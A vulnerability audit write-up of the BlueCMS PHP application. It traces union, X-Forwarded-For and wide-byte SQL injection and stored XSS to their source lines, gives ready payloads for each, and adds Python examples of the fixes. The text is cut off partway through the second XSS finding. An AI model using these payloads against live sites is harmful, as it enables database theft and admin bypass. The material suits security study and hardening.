The vulnerable file is ad_js.php.

The injection is at line 13. Although $ad_id is passed through addslashes(), it is concatenated into the SQL statement without surrounding single quotes, so there is no quote for addslashes() to protect and the value is used directly in the query. The result of the query is echoed into the page inside a comment, so it can be read straight from the response.
Payload: -1 union select 1,2,3,4,5,6,user()
XFF injection

In the configuration file ./include/common.inc.php, lines 30-36 escape most of the input superglobals, but $_SERVER is not among them:

```php
if(!get_magic_quotes_gpc()){
    $_POST = deep_addslashes($_POST);
    $_GET = deep_addslashes($_GET);
    $_COOKIES = deep_addslashes($_COOKIES); // PHP's superglobal is $_COOKIE; this line escapes nothing
    $_REQUEST = deep_addslashes($_REQUEST);
}
```

The vulnerability is in the getip() function in include/common.fun.php:

```php
function getip()
{
    if (getenv('HTTP_CLIENT_IP')) {
        $ip = getenv('HTTP_CLIENT_IP');
    } elseif (getenv('HTTP_X_FORWARDED_FOR')) { // intended to recover the real client IP behind a proxy
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    } elseif (getenv('HTTP_X_FORWARDED')) {
        $ip = getenv('HTTP_X_FORWARDED');
    } elseif (getenv('HTTP_FORWARDED_FOR')) {
        $ip = getenv('HTTP_FORWARDED_FOR');
    } elseif (getenv('HTTP_FORWARDED')) {
        $ip = getenv('HTTP_FORWARDED');
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
```

The value is read from the environment with getenv(), so every branch except REMOTE_ADDR is taken verbatim from a request header and can be forged; X-Forwarded-For is the one used below (HTTP_CLIENT_IP is checked first, so a Client-IP header would serve equally well). Search the code base for callers of this function.
The first caller is comment.php, line 114:

```php
if($act == 'send'){
    if(empty($id)){
        return false;
    }
    $user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
    $mood = intval($_POST['mood']);
    $content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
    $content = nl2br($content);
    $type = intval($_POST['type']);
    if(empty($content)) {
        showmsg('评论内容不能为空'); // "comment content cannot be empty"
    }
    if($_CFG['comment_is_check'] == 0) {
        $is_check = 1;
    } else {
        $is_check = 0;
    }
    $sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";
    $db->query($sql);
```

getip() is concatenated straight into the SQL statement with no filtering at all, so the payload follows directly from the code:

Payload: X-Forwarded-For: 1' and sleep(5) and '1'='1
The second caller is ./include/common.inc.php, line 45:

```php
$online_ip = getip();
```

getip() is assigned to $online_ip. Searching globally for that variable finds an unfiltered sink in guest_book.php at line 45, where $online_ip is concatenated directly into the SQL statement:

```php
elseif ($act == 'send'){
    $user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
    $rid = intval($_POST['rid']);
    $content = !empty($_POST['content']) ? htmlspecialchars($_POST['content']) : '';
    $content = nl2br($content);
    if(empty($content)) {
        showmsg('评论内容不能为空'); // "comment content cannot be empty"
    }
    $sql = "INSERT INTO " . table('guest_book') . " (id, rid, user_id, add_time, ip, content) VALUES ('', '$rid', '$user_id', '$timestamp', '$online_ip', '$content')";
    $db->query($sql);
    showmsg('恭喜您留言成功', 'guest_book.php?page_id='.$_POST['page_id']); // "your message was posted"
}
```

There are two ways to exploit this. The first is time-based blind injection with X-Forwarded-For: 1' and sleep(5) and '1'='1. The second uses the fact that guest book entries are displayed back: closing the ip value early and supplying the content column yourself puts the query result on the page.

Payload: X-Forwarded-For: 1',database()) #
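Both sinks above trust whatever getip() returns. The Python below is an added example, not BlueCMS code: a replacement for getip() that only honours X-Forwarded-For when the TCP peer is a known reverse proxy, takes the last hop (the one the proxy appended), requires it to parse as an IP address with the ipaddress module, and otherwise falls back to REMOTE_ADDR, plus a log/WAF check that flags header values which are not IP lists. The proxy address 10.0.0.5, the header-dictionary shape and the sample addresses are assumptions constructed for the demo; the payload strings are the page's own.

```python
import ipaddress

# Constructed for the demo: reverse proxies allowed to set X-Forwarded-For (hypothetical address).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def parse_ip(value: str):
    """Return an ipaddress object for a bare IPv4/IPv6 literal, or None for anything else."""
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        return None


def client_ip(headers: dict, remote_addr: str) -> str:
    """Hardened getip(): X-Forwarded-For is consulted only when the TCP peer is a trusted proxy,
    only its last hop (the one the proxy appended) is used, and that hop must parse as an IP.
    Everything else, including SQL fragments such as 1' and sleep(5) and '1'='1, falls back to
    REMOTE_ADDR, which the web server fills from the socket and the client cannot forge."""
    peer = parse_ip(remote_addr)
    if peer is None:
        raise ValueError("REMOTE_ADDR is not an IP address")
    if peer in TRUSTED_PROXIES:
        hops = [h for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
        if hops:
            forwarded = parse_ip(hops[-1])
            if forwarded is not None:
                return str(forwarded)
    return str(peer)


def xff_is_suspicious(value: str) -> bool:
    """Log/WAF check: a genuine X-Forwarded-For is a comma-separated list of IP literals.
    Quotes, SQL keywords or comment markers anywhere in it mean an injection attempt or garbage."""
    return any(parse_ip(h) is None for h in value.split(","))
```

Because the value returned by client_ip() is re-serialised from a parsed address object, it is safe to store even through the unparameterised INSERTs above; the real fix for those queries is still a prepared statement.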
Wide-byte injection

The site's database configuration file ./data/config.php shows that the gb2312 encoding is in use.

The backend login page is ./admin/login.php; it verifies the username and password with check_admin().

Following that function to ./admin/include/common.fun.php, line 179:

```php
function check_admin($name, $pwd)
{
    global $db;
    $row = $db->getone("SELECT COUNT(*) AS num FROM ".table('admin')." WHERE admin_name='$name' and pwd = md5('$pwd')");
    if($row['num'] > 0) {
        return true;
    } else {
        return false;
    }
}
```

The $_POST data has been escaped by addslashes(), but a leading %df byte makes the database read the escaping backslash (0x5c) as the second byte of a two-byte character, so the single quote that follows is no longer escaped and a wide-byte injection results.

Capture the request and edit it in Burp: if the payload is typed into the browser, the %df is itself URL-encoded and never reaches the server as a raw byte.

Payload: admin_name=1%df'+or+1=1%23
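How the %df byte defeats addslashes(), as an added Python model (not BlueCMS code). It reproduces check_admin()'s query construction byte for byte, then decodes the result the way a GBK-family connection charset would. The decoding uses Python's gbk codec, in which 0xDF 0x5C is one two-byte character; the page only identifies gb2312 from the config file, so which charset the live MySQL connection actually negotiates is an assumption here, and the same bytes decoded as UTF-8 keep the escape intact. The table name blue_admin and the payload bytes are constructed. The charset-aware variant shows the fix: escape characters after decoding with the same charset the server uses, which is what mysqli_set_charset() followed by mysqli_real_escape_string(), or a prepared statement, achieves.

```python
# Constructed: the page's admin_name=1%df'+or+1=1%23 after URL-decoding.
PAYLOAD = b"1\xdf' or 1=1#"


def addslashes(data: bytes) -> bytes:
    """Byte-level model of PHP addslashes(): prefix ' " \\ and NUL with a 0x5C backslash."""
    return b"".join(b"\\" + bytes([b]) if b in b"'\"\\\x00" else bytes([b]) for b in data)


def vulnerable_query(admin_name: bytes) -> bytes:
    """check_admin()'s construction: escape the raw bytes, then splice into a single-quoted literal."""
    return b"SELECT COUNT(*) AS num FROM blue_admin WHERE admin_name='" + addslashes(admin_name) + b"'"


def as_seen_by_server(raw_sql: bytes, charset: str) -> str:
    """The statement once the server decodes the byte string with the connection charset.
    With gbk, 0xDF followed by the 0x5C backslash becomes a single CJK character and the
    backslash disappears; with utf-8 the 0xDF byte is rejected on its own and the backslash survives."""
    return raw_sql.decode(charset, errors="replace")


def quote_still_escaped(sql: str) -> bool:
    """True when every quote inside the admin_name literal is still preceded by a backslash."""
    inner = sql.split("admin_name='", 1)[1][:-1]
    return all(i > 0 and inner[i - 1] == "\\" for i, ch in enumerate(inner) if ch == "'")


def charset_aware_query(admin_name: bytes, charset: str) -> str:
    """The fix: decode with the connection charset first, then escape characters rather than bytes.
    A lone 0xDF is now a decoding error (replaced), not a partner for the escaping backslash."""
    name = admin_name.decode(charset, errors="replace")
    escaped = name.replace("\\", "\\\\").replace("'", "\\'")
    return "SELECT COUNT(*) AS num FROM blue_admin WHERE admin_name='" + escaped + "'"
```

In the gbk-decoded vulnerable statement the literal closes after the injected character, and the trailing # turns the original closing quote into a comment, which is exactly what the page's payload relies on.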
union SQL injection 2 (backend)

The vulnerable file is ./admin/article.php, lines 131-139:

```php
elseif($act == 'del'){
    $article = $db->getone("SELECT cid, lit_pic FROM ".table('article')." WHERE id=".$_GET['id']);
    $sql = "DELETE FROM ".table('article')." WHERE id=".intval($_GET['id']);
    $db->query($sql);
    if (file_exists(BLUE_ROOT.$article['lit_pic'])) {
        @unlink(BLUE_ROOT.$article['list_pic']);
    }
    showmsg('删除本地新闻成功', 'article.php?cid='.$article['cid']); // "local news item deleted"
}
```

The id parameter from GET is inserted straight into the SELECT without any filtering. Note that the DELETE two lines later does wrap the same parameter in intval(); only the SELECT is exposed, and since it runs first the injection succeeds regardless.
Payload: act=del&id=-1 union select user(),2
union SQL injection 3 (backend)

The vulnerable file is ./admin/nav.php, lines 63-70:

```php
elseif($act=='edit'){
    $sql = "select * from ".table('navigate')." where navid = ".$_GET['navid'];
    $nav = $db->getone($sql);
    $smarty->assign('nav',$nav);
    $smarty->assign('act', $act);
    $smarty->display('nav_info.htm');
}
```

The navid parameter from GET is inserted straight into the SQL statement without any filtering, and the row is rendered by the template, so the union result is visible on the page.

Payload: act=edit&navid=-1 union select 1,user(),database(),4,version(),6 --+
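All three union injections (ad_js.php, article.php and nav.php) share one root cause: the parameter lands in a numeric comparison with no surrounding quotes, so the addslashes() that common.inc.php applies to $_GET has no quote or backslash to act on and the payload passes through unchanged. The Python below is an added example, not BlueCMS code, using an in-memory SQLite table that stands in for the navigate table (constructed; sqlite_version() plays the role of MySQL's user()/version()). It shows the payload surviving addslashes(), the union pulling a value from outside the table, and the two fixes: an intval()-style cast or a bound parameter.

```python
import sqlite3

# Constructed payload in the shape of the page's -1 union select ... ; two columns to match the SELECT below.
PAYLOAD = "-1 union select 1, sqlite_version()"


def addslashes(s: str) -> str:
    """Model of PHP addslashes(). None of the characters it escapes occur in PAYLOAD."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"').replace("\x00", "\\\x00")


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the navigate table nav.php reads from."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE blue_navigate(navid INTEGER PRIMARY KEY, navname TEXT);"
        "INSERT INTO blue_navigate VALUES (1, 'Home'), (2, 'News');"
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, navid: str):
    """nav.php's shape: the value is escaped (as common.inc.php does for $_GET) and then concatenated
    into a numeric comparison with no quotes, so the escaping is irrelevant and UNION is accepted."""
    sql = "SELECT navid, navname FROM blue_navigate WHERE navid = " + addslashes(navid)
    return conn.execute(sql).fetchall()


def hardened_lookup(conn: sqlite3.Connection, navid: str):
    """Two independent fixes: coerce to an integer (the intval() article.php applies to its DELETE
    but not to its SELECT) and bind the value as a parameter instead of concatenating it."""
    try:
        n = int(navid)
    except ValueError:
        return []
    return conn.execute("SELECT navid, navname FROM blue_navigate WHERE navid = ?", (n,)).fetchall()
```

Either fix alone closes the hole; together they also make the intent of the query obvious to the next reader. The cast is the cheaper patch for a code base like this one that builds SQL by string concatenation everywhere.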
0x02 XSS

Stored XSS 1

The vulnerable file is ./user.php, lines 134-140:

```php
elseif($act == 'do_reg'){
    $user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
    $pwd = !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
    $pwd1 = !empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
    $email = !empty($_POST['email']) ? trim($_POST['email']) : '';
    $safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
    $from = !empty($from) ? base64_decode($from) : 'user.php';
```

The only processing $email receives is trim(), which strips leading and trailing whitespace, and the addslashes() from common.inc.php, which backslash-escapes single and double quotes; neither removes or encodes HTML. The front end enforces an email format, so capture the registration request and modify it.

Alternatively, register a normal account and change the email on the user's profile management page, where it can be edited directly without intercepting the request.
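Why trim() plus addslashes() does nothing for this field, as an added Python model (not BlueCMS code). The backslashes addslashes() inserts are consumed by MySQL's string-literal parser on INSERT, so the stored value is the raw input, and a backslash would not be an escape character in HTML anyway. The profile-form markup, the payload and the email pattern are constructed for the example; the hardened version validates the email server-side on input and HTML-encodes on output.

```python
import html
import re

# Constructed attribute-breakout payload for a field echoed inside value="...".
PAYLOAD = '"><script>alert(1)</script>'


def addslashes(s: str) -> str:
    """Model of PHP addslashes(): backslash-escape single quote, double quote, backslash and NUL."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", s)


def sql_unescape(literal: str) -> str:
    """Simplified MySQL string-literal parsing: a backslash escapes the next character and is dropped.
    This is what happens to addslashes()'s backslashes on INSERT, so they never reach the table."""
    return re.sub(r"\\(.)", r"\1", literal, flags=re.S)


def stored_email(submitted: str) -> str:
    """Value that ends up in the users table after trim() + addslashes() + INSERT."""
    return sql_unescape(addslashes(submitted.strip()))


def render_vulnerable(stored: str) -> str:
    """Profile page echoing the stored email into an attribute without encoding (constructed markup)."""
    return '<input type="text" name="email" value="' + stored + '">'


def render_hardened(stored: str) -> str:
    """Same markup with HTML encoding for attribute context; quote=True also encodes the delimiter."""
    return '<input type="text" name="email" value="' + html.escape(stored, quote=True) + '">'


# Deliberately strict: one local part, one or more dotted labels, no quotes or angle brackets possible.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def is_valid_email(value: str) -> bool:
    """Server-side counterpart of the front-end format check the attacker bypasses by editing the request."""
    return EMAIL_RE.fullmatch(value.strip()) is not None


def script_in_html_context(markup: str) -> bool:
    """Strip every well-formed double-quoted attribute value; any <script left over sits in HTML context."""
    return "<script" in re.sub(r'="[^"]*"', "", markup)
```

The validation step is what stops the payload from being stored at all; the output encoding is what protects every other page that prints the same column, including the admin pages, if a value ever gets in by another route.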
Stored XSS 2

The vulnerable file is again ./user.php, at line 266:

```php
elseif ($act == 'do_add_news') {
    include_once 'include/upload.class.php';
    $image = new upload();
    $title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : '';
    $color = !empty($_POST['color']) ? htmlspecialchars(trim($_POST['color'])) : '';
    $cid = !empty($_POST['cid']) ? intval($_POST['cid']) : '';
    if(empty($cid)){
        showmsg('新闻分类不能为空'); // "news category cannot be empty"
    }
    $author = !empty($_POST['author']) ? htmlspecialchars(trim($_POST['author'])) : $_SESSION['admin_name'];
    $source = !empty($_POST['source']) ? htmlspecialchars(trim($_POST['source'])) : '';
    $content = !empty($_POST['content']) ? filter_data($_POST['content']) : '';
    $descript = !empty($_POST['descript']) ? mb_substr($_POST['descript'], 0, 90) : mb_substr(html2text($_POST['content']),0, 90);
```

The $content parameter is passed through filter_data(). Following that function to ./include/common.fun.php, lines 985-989:

function filter_data($str){$str = preg_replace("/